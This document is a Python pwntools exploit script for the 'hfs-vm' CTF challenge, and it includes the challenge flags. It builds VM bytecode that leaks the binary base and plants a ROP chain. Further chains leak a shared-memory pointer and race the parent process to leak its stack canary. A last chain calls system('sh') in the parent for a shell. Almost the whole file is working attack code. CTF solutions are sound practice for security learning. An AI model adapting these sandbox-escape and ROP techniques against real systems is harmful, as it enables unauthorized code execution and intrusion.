#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *

"""
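instruction encoding (32 bits; fields listed from least to most significant bit):
    low 16-bit word:
        5 bits: instruction type (opcode)
        4 bits: 1st operand (reg)
        4 bits: 2nd operand (reg)
        1 bit:  2nd operand source: reg (0) / imm (1)
        2 bits: unused (never set by instr())
    high 16-bit word: 2nd operand (imm)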

flags:
    midnight{m3_h4bl0_vm}
    midnight{7h3re5_n0_I_iN_VM_bu7_iF_th3r3_w@s_1t_w0uld_b3_VIM}
"""

# Gadget / function offsets inside the hfs-vm binary. They are relative to the
# PIE base: gen_rop tags them as relative, and later stages add
# binary.address to them. The instruction sequences named below are inferred
# from the variable names -- verify against the binary.
pop_rdi = 0x1e83     # presumably `pop rdi; ret`
pop_rsi = 0x198f     # presumably `pop rsi; ...; ret`
pop_rdx = 0x101d     # presumably `pop rdx; ret`
pop_rsp = 0x1112     # stack pivot: next chain entry becomes the new rsp
gadget_ret = 0xe29   # plain `ret`, used as padding in the parent chain

# Offsets (relative to the PIE base) of data used by the later stages.
off_shared_mem = 0x203100    # 8 bytes here are leaked as the shared_mem pointer
off_second_chain = 0x203b00  # where the 3rd-stage chain is read and pivoted to

# File descriptor the child writes syscall requests to (see data_sys).
# The value differs between the remote service and the local setup.
parent_fd = 6 if args.REMOTE else 3


def exploit():
    """Run the full multi-stage exploit against hfs-vm.

    Stages, in order:
      1. Send VM bytecode (gen_bytecode). It leaks the binary base via the
         VM's REG_01..REG_04 dump. It also plants a first ROP chain (gen_rop)
         that reads the next chain into the data region and pivots to it.
      2. Second chain: write the 8-byte pointer stored at off_shared_mem to
         stdout, read a third chain to off_second_chain, and pivot there.
      3. Third chain: send 5-byte requests (data_sys) to ``parent_fd``.
         Overwrite the shared_mem size field while the parent is busy, so
         that (presumably) the parent copies its stack canary into
         shared_mem, and leak that canary. Then ship a parent ROP chain
         calling system("sh").

    Sets the module globals ``g`` (the tube) and ``binary`` (the ELF);
    gen_rop reads ``binary``. Ends in an interactive session.
    """
    global g, binary
    if args.REMOTE:
        g = remote('hfs-vm-01.play.midnightsunctf.se', 4096)
    else:
        g = process('hfs-vm')
    binary = ELF('hfs-vm')
    context.binary = binary

    # rop entries are (value, is_relative); the dump shows unrebased offsets.
    rop = gen_rop()
    info("ROP:\n%s", hexdump(''.join(p64(val) for val, rel in rop)))
    bytecode = gen_bytecode(rop)
    info("BC:\n%s", hexdump(bytecode))

    # send bytecode
    # The service first asks for the bytecode length, then the bytecode.
    g.sendlineafter('length: ', str(len(bytecode)))
    g.sendafter('code: ', bytecode)
    g.recvuntil('in sandbox')

    # leak binary
    # The bytecode's debug opcode prints the registers; regs 1..4 hold the
    # four 16-bit words of the base address (see gen_bytecode).
    g.recvuntil('REG_01: ')
    r1 = int(g.recvuntil('\n', drop=True), 0)
    g.recvuntil('REG_02: ')
    r2 = int(g.recvuntil('\n', drop=True), 0)
    g.recvuntil('REG_03: ')
    r3 = int(g.recvuntil('\n', drop=True), 0)
    g.recvuntil('REG_04: ')
    r4 = int(g.recvuntil('\n', drop=True), 0)
    g.recvuntil('=====\n')
    binary.address = r1 | (r2 << 16) | (r3 << 32) | (r4 << 48)

    # second rop chain to leak shared_mem pointer
    # This chain is consumed by the first-stage read() and runs after its
    # stack pivot. It then reads the next chain to off_second_chain and
    # pivots there.
    rop = ROP(binary)
    rop.write(1, binary.address + off_shared_mem, 8)
    rop.read(0, binary.address + off_second_chain, 0x500)
    rop.raw(binary.address + pop_rsp)
    rop.raw(binary.address + off_second_chain)
    info("2nd ROP:\n%s", rop.dump())
    g.send(rop.chain())
    # leak pointer
    shared_mem = u64(g.recvn(8))
    info("shared_mem @ 0x%x", shared_mem)

    # third rop chain

    rop = ROP(binary)
    # Request records for the parent. They are appended after the chain,
    # which is padded to 0x200 bytes below, so they live at rop_data_addr.
    rop_data = ''
    rop_data_addr = binary.address + off_second_chain + 0x200

    # trigger sys_random(4)
    rop.write(parent_fd, rop_data_addr, 5)
    rop_data += data_sys(4, 4)
    # overwrite shared_mem size
    # (receives the 2-byte p16(80) sent after the first sleep below)
    rop.read(0, shared_mem, 2)
    # dummy read, just for waiting a bit
    rop.read(0, shared_mem, 2)
    # leak parent stack canary
    # Offset 74 = 2-byte size header + 72 bytes; this matches the 72-byte
    # padding before the canary in the parent chain built below.
    rop.write(1, shared_mem + 74, 8)
    # read rop chain for parent to shared_mem
    rop.read(0, shared_mem, 0x1000)
    # trigger rop in parent, via sys_ls()
    rop.write(parent_fd, rop_data_addr + len(rop_data), 5)
    rop_data += data_sys(6)
    # exit
    rop.exit(0)

    # send 3rd chain
    info("3rd ROP:\n%s", rop.dump())
    g.send(rop.chain().ljust(0x200, '\0') + rop_data)

    # interact with 3rd chain
    # Timing-based: the sleeps give the other side time to reach each state.
    # sleep to wait for kernel to enter sys_random()
    sleep(1)
    # overwrite shared_mem size
    g.send(p16(80))
    # wait for kernel to copy canary
    sleep(6)
    g.send(p16(80))
    # read parent stack canary
    canary = g.recvn(8)
    info("parent canary: %s", enhex(canary))

    # send parent rop chain
    rop = ROP(binary)
    # "sh" is placed at offset 0x300 of the payload read into shared_mem.
    rop.system(shared_mem + 0x300)
    info("parent ROP:\n%s", rop.dump())
    # Layout: 72 bytes padding, canary, 40 bytes up to the return address
    # (presumably saved registers), then an extra `ret` (presumably for
    # stack alignment before system() -- verify), then the system() chain.
    chain = 'A' * 72 + canary + 'B' * 40 + p64(binary.address + gadget_ret) * 1 + rop.chain()
    # 2-byte length header + chain, padded so "sh\0" lands at offset 0x300.
    g.send((p16(len(chain)) + chain).ljust(0x300, '\0') + 'sh\0')

    g.interactive()


def gen_bytecode(rop):
    """Assemble VM bytecode that leaks the binary base and plants ``rop``.

    The emitted program:
      1. loads VM stack slots 52..54 (the low three 16-bit words of a return
         address into the binary) into registers 1..3. Register 4 is not
         loaded because that word is always zero.
      2. subtracts 0xe6e from register 1 so regs 1..3 hold the base address.
      3. emits opcode 0xa, a debug instruction whose register dump serves as
         the base-address leak.
      4. overwrites VM stack slots from 52 upward with ``rop``, four 16-bit
         words per entry. Relative entries get the base added word by word
         through scratch registers 5..8.

    NOTE(review): the word-wise add_rr does not propagate carries between
    16-bit words. If a base word plus an offset word exceeds 0xffff, the
    planted address is presumably wrong. Confirm how the VM registers wrap,
    or accept occasional failed runs.

    Args:
        rop: iterable of ``(value, is_relative)`` pairs (see gen_rop).

    Returns:
        The concatenated bytecode string.
    """
    # Steps 1-3: base-address computation and leak.
    code = [mov_rs(reg, slot) for reg, slot in ((1, 52), (2, 53), (3, 54))]
    code.append(sub_ri(1, 0xe6e))
    code.append(p32(0xa))

    # Step 4: plant the chain over the saved return address and beyond.
    for entry_no, (value, relative) in enumerate(rop):
        first_slot = 52 + 4 * entry_no
        words = [(value >> shift) & 0xffff for shift in (0, 16, 32, 48)]
        if relative:
            # Stage the raw offset in regs 5..8 ...
            code.extend(mov_ri(5 + i, word) for i, word in enumerate(words))
            # ... add the base to the low three words only ...
            code.extend(add_rr(5 + i, 1 + i) for i in range(3))
            # ... and spill the rebased value onto the VM stack.
            code.extend(mov_sr(first_slot + i, 5 + i) for i in range(4))
        else:
            # Absolute values go straight onto the stack as immediates.
            code.extend(mov_si(first_slot + i, word) for i, word in enumerate(words))

    return ''.join(code)


def gen_rop():
    """Build the first-stage ROP chain that gen_bytecode plants.

    Returns a tuple of ``(value, is_relative)`` pairs. ``is_relative`` marks
    values that are offsets into the binary, to which the leaked base must
    be added; other values are written verbatim.

    The chain calls read(0, data + 0xa00, 0xe00) and then pivots rsp to
    data + 0xa00, so the next chain is read from the socket and executed.
    Requires the module-global ``binary`` (set by exploit()).
    """
    stage2 = 0x203000 + 0xa00  # data + 0xa00: landing zone for the next chain

    def rel(value):
        return (value, True)

    def absolute(value):
        return (value, False)

    return (
        # read(0, data + 0xa00, 0xe00)
        rel(pop_rdi), absolute(0),
        rel(pop_rsi), rel(stage2),
        rel(pop_rdx), absolute(0xe00),
        rel(binary.plt.read),
        # rsp = data + 0xa00
        rel(pop_rsp), rel(stage2),
    )


def instr(type, is_imm, imm=0, reg1=0, reg2=0):
    """Encode one 32-bit VM instruction.

    Low 16-bit word, from the least significant bit: 5-bit opcode (``type``),
    4-bit first operand (``reg1``), 4-bit second register operand (``reg2``),
    1-bit immediate flag (``is_imm``). The high 16-bit word holds ``imm``.

    Args:
        type: opcode, 0..31. The name shadows the builtin but is kept for
            interface compatibility.
        is_imm: 1 if the second operand is ``imm``, 0 if it is ``reg2``.
        imm: 16-bit immediate (range checking is left to p16).
        reg1: first register operand, 0..15.
        reg2: second register operand, 0..15.

    Returns:
        The 4-byte encoded instruction.

    Raises:
        ValueError: if ``type``, ``reg1``, ``reg2`` or ``is_imm`` does not fit
            its bit width. Without this check an oversized value would
            silently spill into the neighbouring field.
    """
    fields = (('type', type, 5), ('reg1', reg1, 4),
              ('reg2', reg2, 4), ('is_imm', is_imm, 1))
    for name, value, bits in fields:
        if not 0 <= value < (1 << bits):
            raise ValueError('%s=%r does not fit in %d bits' % (name, value, bits))
    low_word = type | (reg1 << 5) | (reg2 << 9) | (is_imm << 13)
    return p16(low_word) + p16(imm)


def mov_ri(reg, imm):
    """Encode ``reg = imm`` (opcode 0, immediate form)."""
    return instr(0, is_imm=1, imm=imm, reg1=reg)


def add_ri(reg, imm):
    """Encode opcode 1 with an immediate operand (by its name, ``reg += imm``)."""
    return instr(1, is_imm=1, imm=imm, reg1=reg)


def add_rr(reg1, reg2):
    """Encode ``reg1 += reg2`` (opcode 1, register form)."""
    return instr(1, is_imm=0, reg1=reg1, reg2=reg2)


def sub_ri(reg, imm):
    """Encode ``reg -= imm`` (opcode 2, immediate form)."""
    return instr(2, is_imm=1, imm=imm, reg1=reg)


def mov_rs(reg, idx):
    """Load VM stack slot ``idx`` into ``reg``.

    Emits two instructions: ``r0 = idx``, then opcode 8 (register form) with
    r0 as the index register. Clobbers register 0.
    """
    set_index = mov_ri(0, idx)
    load = instr(8, 0, reg1=reg, reg2=0)
    return set_index + load


def mov_sr(idx, reg):
    """Store register ``reg`` into VM stack slot ``idx``.

    Emits two instructions: ``r0 = idx``, then opcode 7 (register form) with
    r0 as the index and ``reg`` as the source. Clobbers register 0.
    """
    set_index = mov_ri(0, idx)
    store = instr(7, 0, reg1=0, reg2=reg)
    return set_index + store


def mov_si(idx, imm):
    """Store the 16-bit immediate ``imm`` into VM stack slot ``idx``.

    Emits two instructions: ``r0 = idx``, then opcode 7 (immediate form) with
    r0 as the index. Clobbers register 0.
    """
    set_index = mov_ri(0, idx)
    store = instr(7, 1, reg1=0, imm=imm)
    return set_index + store


def data_sys(num, arg1=0, arg2=0):
    """Pack a 5-byte request record: 1-byte number, then two 16-bit args.

    exploit() writes these records to ``parent_fd``, for example
    ``data_sys(4, 4)`` for sys_random(4) and ``data_sys(6)`` for sys_ls().
    Packing uses pwntools' p8/p16 under the current context.
    """
    return b''.join((p8(num), p16(arg1), p16(arg2)))


if __name__ == "__main__":
    # Run the exploit only when executed as a script, not when imported.
    exploit()
